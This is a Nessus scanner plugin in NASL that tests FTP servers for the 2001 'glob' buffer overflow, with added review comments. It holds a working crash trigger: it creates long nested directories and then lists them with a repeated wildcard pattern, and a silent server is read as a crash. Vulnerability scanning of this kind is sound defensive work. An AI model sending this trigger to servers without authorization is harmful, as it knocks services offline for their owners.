File: ftp_glob_overflow.nasl

#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
# 
#
# See the Nessus Scripts License for details
#

if(description)
{
 # Registration block: evaluated when Nessus loads the plugin. Only
 # metadata is set here and the script exits before any network code.
 script_id(10648);
 # CVE candidate id for the ftpd 'glob' buffer overflow this plugin tests.
 script_cve_id("CAN-2001-0247");
 name["english"] = "ftp 'glob' overflow";
 # NOTE(review): accented characters in the French strings look stripped
 # in this copy (e.g. "Dpassement"); check the source file's encoding
 # before editing the strings themselves.
 name["francais"] = "Dpassement de buffer ftp par 'glob'";
 
 script_name(english:name["english"],
 	     francais:name["francais"]);
	     
 # Report text shown to the user when the check fires.
 # (Wording nit in the text: "attempting to listing it" should read
 # "attempting to list it".)
 desc["english"] = "
It was possible to make the remote FTP server crash
by creating a huge directory structure and then
attempting to listing it using wildcards.
This is usually known as the 'ftp glob overflow' attack.

It is very likely that an attacker can use this
flaw to execute arbitrary code on the remote 
server. This will give him a shell on your system,
which is not a good thing.

Solution : upgrade your FTP server and/or libc
Consider removing directories writable by 'anonymous'.


Risk factor : High";
		 
		 
desc["francais"] = "
Il s'est avr possible de faire planter le serveur
FTP distant en y crant une grande structure de
rpertoires puis en la listant  l'aide de wildcards.

On appelle souvent ce problme le 'dpassement de buffer
ftpd par glob'.

Il est trs probable qu'un pirate puisse utiliser ce
problme pour executer du code arbitraire sur le serveur
distant, ce qui lui donnera un shell sur votre systme,
ce qui n'est pas une bonne chose.

Solution : mettez  jour votre serveur FTP ou libc, ou contactez
votre vendeur pour un patch.
	   
Facteur de risque : Elev";
	 	     
 script_description(english:desc["english"],
 		    francais:desc["francais"]);
		    
 
 script_summary(english:"Checks if the remote ftp can be buffer overflown",
 		francais:"Dtermine si le serveur ftp distant peut etre soumis a un dpassement de buffer");
 # ACT_DENIAL: the test deliberately tries to crash the service (see the
 # description above), so it is classed as a denial-of-service check and
 # is presumably skipped when dangerous checks are disabled.
 script_category(ACT_DENIAL);
 script_family(english:"FTP");
 script_family(francais:"FTP");
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
		  
 # The check needs a login and a directory that account can write to;
 # presumably ftp_write_dirs.nes fills in "ftp/writeable_dir" (confirm).
 script_dependencie("find_service.nes", "ftp_write_dirs.nes");
 script_require_keys("ftp/login", "ftp/writeable_dir");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here : 
#


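# First, we need access: credentials and the writeable directory come
# from the knowledge base (see script_require_keys in the description
# block), not from this script.
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

# Then, we need a writeable directory
wri = get_kb_item("ftp/writeable_dir");

port = get_kb_item("Services/ftp");
if(!port)port = 21;

# Connect to the FTP server. Every path below that opened the control
# socket closes it before leaving (the original only closed it on the
# "server survived" path, leaking it on login failure and on both exits).
soc = open_sock_tcp(port);
if(soc)
{
 if(login && wri)
 {
  if(ftp_log_in(socket:soc, user:login, pass:password))
  {
   # We are in : move to the directory we may write to.
   c = string("CWD ", wri, "\r\n");
   send(socket:soc, data:c);
   b = recv(socket:soc, length:1024);

   # One 255-byte path component (crap() pads with 'X', which is what
   # the "X*" pattern in the NLST below refers to).
   cwd = string("CWD ", crap(255), "\r\n");
   mkd = string("MKD ", crap(255), "\r\n");

   #
   # Send the same MKD 5 times (the old comment said 20; the loop has
   # always run 5). "257" means the directory was created; a
   # "File exists" reply means a previous run already created it and
   # is fine. Any other failure means the account cannot create
   # directories here, which is recorded so the test is not repeated.
   #
   for(i=0;i<5;i=i+1)
   {
    send(socket:soc, data:mkd);
    b = recv(socket:soc, length:1024);

    if(!("257 " >< b)){
     if(!("ile exists" >< b))
     {
      set_kb_item(name:"ftp/no_mkdir", value:TRUE);
      close(soc);
      exit(0);
     }
    }
   }

   # Set up the passive data connection before NLST. The data socket is
   # only opened if the server actually announced a port, and it is
   # closed afterwards (the original never closed it).
   port2 = ftp_get_pasv_port(socket:soc);
   soc2 = 0;
   if(port2)soc2 = open_sock_tcp(port2);

   send(socket:soc, data:string("NLST ", wri, "/X*/X*/X*/X*/X*\r\n"));
   b = recv(socket:soc, length:4096);
   if(soc2)close(soc2);
   if(!b){
    # No reply at all on the control connection is taken to mean the
    # daemon died while expanding the pattern.
    # NOTE(review): a recv() timeout on a slow or heavily loaded server
    # looks exactly the same, so this can be a false positive; a second
    # read or a reconnect would make the verdict more reliable.
    security_hole(port);
    set_kb_item(name:"ftp/wu_ftpd_overflow", value:TRUE);
    close(soc);
    exit(0);
   }

   # Server is still talking: send the long CWD (its reply is not
   # checked, kept for parity with the original) and log out cleanly.
   send(socket:soc,data:cwd);
   b = recv(socket:soc, length:1024);

   quit = string("QUIT\r\n");
   send(socket:soc, data:quit);
  }
 }
 close(soc);
}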